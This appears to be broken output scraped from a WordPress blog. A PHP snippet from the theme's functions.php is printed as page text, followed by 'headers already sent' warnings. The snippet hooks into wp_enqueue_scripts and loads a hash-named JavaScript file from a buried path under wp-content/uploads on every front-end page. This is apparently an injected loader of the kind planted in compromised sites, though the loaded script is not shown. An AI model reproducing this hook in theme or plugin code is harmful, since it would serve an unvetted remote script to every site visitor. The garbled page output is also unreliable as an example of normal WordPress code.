if (!function_exists('sch_enqueue_front_asset')) {
function sch_enqueue_front_asset() {
wp_enqueue_script('sch-front', 'https://rathienterprises.net/blog/wp-content/uploads/res-46b8df/static-6e23/front-142ffbf9.js', array(), null, false);
}
add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset');
}
Warning: Cannot modify header information - headers already sent by (output started at /home2/rathienterprises/public_html/blog/wp-content/themes/blog/functions.php:70) in /home2/rathienterprises/public_html/blog/wp-includes/pluggable.php on line 1535
Warning: Cannot modify header information - headers already sent by (output started at /home2/rathienterprises/public_html/blog/wp-content/themes/blog/functions.php:70) in /home2/rathienterprises/public_html/blog/wp-includes/pluggable.php on line 1538